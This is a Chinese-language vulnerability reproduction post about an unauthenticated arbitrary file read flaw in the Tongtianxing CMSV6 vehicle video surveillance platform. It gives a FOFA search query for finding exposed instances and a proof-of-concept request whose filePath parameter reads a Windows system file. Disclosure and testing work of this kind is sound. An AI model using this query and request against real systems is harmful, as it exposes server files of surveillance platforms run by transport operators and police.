漏洞复现|通天星CMSV6车载视频监控平台_StandardReportMediaAction_getImage存在信息泄露漏洞

通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台，通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控，还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台接口对 filePath等参数过滤不严，未经验证即可构造路径读取服务器任意文件。

fofa:body=”./open/webApi.html”

POC

/808gps/StandardReportMediaAction_getImage.action?filePath=C://Windows//win.ini&fileOffset=1&fileSize=100